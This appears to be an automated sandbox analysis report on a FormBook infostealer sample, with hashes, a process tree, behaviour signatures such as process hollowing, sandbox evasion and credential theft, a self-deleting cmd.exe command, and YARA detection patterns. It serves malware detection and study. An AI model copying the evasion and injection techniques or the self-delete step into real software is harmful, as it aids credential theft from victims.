Play interactive tour

Edit tour

Analysis Report PO20012ZAS23JULY2020.exe

Overview

General Information

Sample Name:	PO20012ZAS23JULY2020.exe
Analysis ID:	254500
MD5:	42b6b24afda2c0fad7b70b9c184bc36f
SHA1:	5ae9d3f42bc3fd7a60583fab982ae962ea61b416
SHA256:	c0f75c29c7e6f1531ae8f5b9f3e1f6c1c11d0f6cc06a76d308cc5a7f4e7736ac
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

Detected FormBook malware

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

PO20012ZAS23JULY2020.exe (PID: 6908 cmdline: 'C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe' MD5: 42B6B24AFDA2C0FAD7B70B9C184BC36F)

PO20012ZAS23JULY2020.exe (PID: 7072 cmdline: {path} MD5: 42B6B24AFDA2C0FAD7B70B9C184BC36F)

explorer.exe (PID: 3456 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

WWAHost.exe (PID: 5540 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)

cmd.exe (PID: 5552 cmdline: /c del 'C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

tzypqb0hdn.exe (PID: 1880 cmdline: C:\Program Files (x86)\Yulx\tzypqb0hdn.exe MD5: 42B6B24AFDA2C0FAD7B70B9C184BC36F)

tzypqb0hdn.exe (PID: 1888 cmdline: {path} MD5: 42B6B24AFDA2C0FAD7B70B9C184BC36F)

tzypqb0hdn.exe (PID: 5836 cmdline: 'C:\Program Files (x86)\Yulx\tzypqb0hdn.exe' MD5: 42B6B24AFDA2C0FAD7B70B9C184BC36F)

tzypqb0hdn.exe (PID: 5904 cmdline: {path} MD5: 42B6B24AFDA2C0FAD7B70B9C184BC36F)

autoconv.exe (PID: 6288 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)

cmd.exe (PID: 7160 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
PO20012ZAS23JULY2020.exe	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x68159:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\Yulx\tzypqb0hdn.exe	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x68159:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV

Memory Dumps

Source	Rule	Description	Author	Strings
0000001F.00000000.473400529.00000000007F2000.00000002.00020000.sdmp	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x67f59:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
00000000.00000002.243951607.00000000039DE000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.243951607.00000000039DE000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85800:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x85a6a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xae820:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xaea8a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x910ed:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xba10d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x90bd9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xb9bf9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x911ef:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xba20f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x91367:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xba387:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x865e2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xaf602:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x8fe54:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb8e74:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x86f7b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xaff9b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x9645f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xbf47f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x97462:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.243951607.00000000039DE000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x93d71:$sqlite3step: 68 34 1C 7B E1 0x93e84:$sqlite3step: 68 34 1C 7B E1 0xbcd91:$sqlite3step: 68 34 1C 7B E1 0xbcea4:$sqlite3step: 68 34 1C 7B E1 0x93da0:$sqlite3text: 68 38 2A 90 C5 0x93ec5:$sqlite3text: 68 38 2A 90 C5 0xbcdc0:$sqlite3text: 68 38 2A 90 C5 0xbcee5:$sqlite3text: 68 38 2A 90 C5 0x93db3:$sqlite3blob: 68 53 D8 7F 8C 0x93edb:$sqlite3blob: 68 53 D8 7F 8C 0xbcdd3:$sqlite3blob: 68 53 D8 7F 8C 0xbcefb:$sqlite3blob: 68 53 D8 7F 8C
00000022.00000002.486023523.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000022.00000002.486023523.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x74b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12b35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x12621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x12c37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x12daf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1189c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x89c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x17ea7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x18eaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000022.00000002.486023523.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x157b9:$sqlite3step: 68 34 1C 7B E1 0x158cc:$sqlite3step: 68 34 1C 7B E1 0x157e8:$sqlite3text: 68 38 2A 90 C5 0x1590d:$sqlite3text: 68 38 2A 90 C5 0x157fb:$sqlite3blob: 68 53 D8 7F 8C 0x15923:$sqlite3blob: 68 53 D8 7F 8C
00000022.00000002.486594223.0000000000E12000.00000002.00020000.sdmp	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x67f59:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
00000022.00000002.487779904.0000000001340000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000022.00000002.487779904.0000000001340000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x74b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12b35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x12621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x12c37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x12daf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1189c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x89c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x17ea7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x18eaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000022.00000002.487779904.0000000001340000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x157b9:$sqlite3step: 68 34 1C 7B E1 0x158cc:$sqlite3step: 68 34 1C 7B E1 0x157e8:$sqlite3text: 68 38 2A 90 C5 0x1590d:$sqlite3text: 68 38 2A 90 C5 0x157fb:$sqlite3blob: 68 53 D8 7F 8C 0x15923:$sqlite3blob: 68 53 D8 7F 8C
0000001D.00000002.474509091.0000000000C62000.00000002.00020000.sdmp	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x67f59:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
0000001E.00000002.483555024.0000000000092000.00000002.00020000.sdmp	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x67f59:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
00000001.00000002.322786943.0000000000F80000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.322786943.0000000000F80000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x74b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12b35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x12621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x12c37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x12daf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1189c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x89c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x17ea7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x18eaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.322786943.0000000000F80000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x157b9:$sqlite3step: 68 34 1C 7B E1 0x158cc:$sqlite3step: 68 34 1C 7B E1 0x157e8:$sqlite3text: 68 38 2A 90 C5 0x1590d:$sqlite3text: 68 38 2A 90 C5 0x157fb:$sqlite3blob: 68 53 D8 7F 8C 0x15923:$sqlite3blob: 68 53 D8 7F 8C
0000001E.00000000.461964562.0000000000092000.00000002.00020000.sdmp	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x67f59:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
0000001D.00000002.476866137.000000000406B000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001D.00000002.476866137.000000000406B000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x852c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x85532:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xae2e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xae552:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x90bb5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xb9bd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x906a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xb96c1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x90cb7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xb9cd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x90e2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xb9e4f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x860aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xaf0ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x8f91c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb893c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x86a43:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xafa63:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x95f27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xbef47:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x96f2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001D.00000002.476866137.000000000406B000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x93839:$sqlite3step: 68 34 1C 7B E1 0x9394c:$sqlite3step: 68 34 1C 7B E1 0xbc859:$sqlite3step: 68 34 1C 7B E1 0xbc96c:$sqlite3step: 68 34 1C 7B E1 0x93868:$sqlite3text: 68 38 2A 90 C5 0x9398d:$sqlite3text: 68 38 2A 90 C5 0xbc888:$sqlite3text: 68 38 2A 90 C5 0xbc9ad:$sqlite3text: 68 38 2A 90 C5 0x9387b:$sqlite3blob: 68 53 D8 7F 8C 0x939a3:$sqlite3blob: 68 53 D8 7F 8C 0xbc89b:$sqlite3blob: 68 53 D8 7F 8C 0xbc9c3:$sqlite3blob: 68 53 D8 7F 8C
0000001D.00000000.454498816.0000000000C62000.00000002.00020000.sdmp	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x67f59:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
00000022.00000000.481330644.0000000000E12000.00000002.00020000.sdmp	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x67f59:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
00000001.00000002.323161625.00000000014C0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.323161625.00000000014C0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x74b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12b35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x12621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x12c37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x12daf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1189c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x89c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x17ea7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x18eaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.323161625.00000000014C0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x157b9:$sqlite3step: 68 34 1C 7B E1 0x158cc:$sqlite3step: 68 34 1C 7B E1 0x157e8:$sqlite3text: 68 38 2A 90 C5 0x1590d:$sqlite3text: 68 38 2A 90 C5 0x157fb:$sqlite3blob: 68 53 D8 7F 8C 0x15923:$sqlite3blob: 68 53 D8 7F 8C
0000001E.00000002.485232592.000000000356B000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001E.00000002.485232592.000000000356B000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x857e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x85a52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xae808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xaea72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x910d5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xba0f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x90bc1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xb9be1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x911d7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xba1f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x9134f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xba36f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x865ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xaf5ea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x8fe3c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb8e5c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x86f63:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xaff83:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x96447:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xbf467:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x9744a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001E.00000002.485232592.000000000356B000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x93d59:$sqlite3step: 68 34 1C 7B E1 0x93e6c:$sqlite3step: 68 34 1C 7B E1 0xbcd79:$sqlite3step: 68 34 1C 7B E1 0xbce8c:$sqlite3step: 68 34 1C 7B E1 0x93d88:$sqlite3text: 68 38 2A 90 C5 0x93ead:$sqlite3text: 68 38 2A 90 C5 0xbcda8:$sqlite3text: 68 38 2A 90 C5 0xbcecd:$sqlite3text: 68 38 2A 90 C5 0x93d9b:$sqlite3blob: 68 53 D8 7F 8C 0x93ec3:$sqlite3blob: 68 53 D8 7F 8C 0xbcdbb:$sqlite3blob: 68 53 D8 7F 8C 0xbcee3:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.490145930.000000000075F000.00000004.00000001.sdmp	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x68179:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
0000000E.00000002.496906207.0000000003A1F000.00000004.00000001.sdmp	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x68981:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
0000000E.00000002.491846641.0000000002EA0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.491846641.0000000002EA0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x74b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12b35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x12621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x12c37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x12daf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1189c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x89c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x17ea7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x18eaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.491846641.0000000002EA0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x157b9:$sqlite3step: 68 34 1C 7B E1 0x158cc:$sqlite3step: 68 34 1C 7B E1 0x157e8:$sqlite3text: 68 38 2A 90 C5 0x1590d:$sqlite3text: 68 38 2A 90 C5 0x157fb:$sqlite3blob: 68 53 D8 7F 8C 0x15923:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.322548757.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.322548757.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x74b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12b35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x12621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x12c37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x12daf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1189c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x89c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x17ea7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x18eaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.322548757.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x157b9:$sqlite3step: 68 34 1C 7B E1 0x158cc:$sqlite3step: 68 34 1C 7B E1 0x157e8:$sqlite3text: 68 38 2A 90 C5 0x1590d:$sqlite3text: 68 38 2A 90 C5 0x157fb:$sqlite3blob: 68 53 D8 7F 8C 0x15923:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000000.216011695.0000000000562000.00000002.00020000.sdmp	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x67f59:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
00000001.00000002.322588257.0000000000A32000.00000002.00020000.sdmp	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x67f59:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
00000000.00000002.242427535.0000000000562000.00000002.00020000.sdmp	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x67f59:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
0000000E.00000002.488951197.0000000000450000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.488951197.0000000000450000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x74b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12b35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x12621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x12c37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x12daf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1189c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x89c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x17ea7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x18eaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.488951197.0000000000450000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x157b9:$sqlite3step: 68 34 1C 7B E1 0x158cc:$sqlite3step: 68 34 1C 7B E1 0x157e8:$sqlite3text: 68 38 2A 90 C5 0x1590d:$sqlite3text: 68 38 2A 90 C5 0x157fb:$sqlite3blob: 68 53 D8 7F 8C 0x15923:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000000.240455327.0000000000A32000.00000002.00020000.sdmp	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x67f59:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
0000000E.00000002.492090705.0000000003350000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.492090705.0000000003350000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x74b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12b35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x12621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x12c37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x12daf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1189c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x89c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x17ea7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x18eaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.492090705.0000000003350000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x157b9:$sqlite3step: 68 34 1C 7B E1 0x158cc:$sqlite3step: 68 34 1C 7B E1 0x157e8:$sqlite3text: 68 38 2A 90 C5 0x1590d:$sqlite3text: 68 38 2A 90 C5 0x157fb:$sqlite3blob: 68 53 D8 7F 8C 0x15923:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: tzypqb0hdn.exe PID: 5836	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x2052c1:$s5: AEAAAAMAAQqVT 0x28fd3:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x2001b9:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x205232:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
Process Memory Space: tzypqb0hdn.exe PID: 5836	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
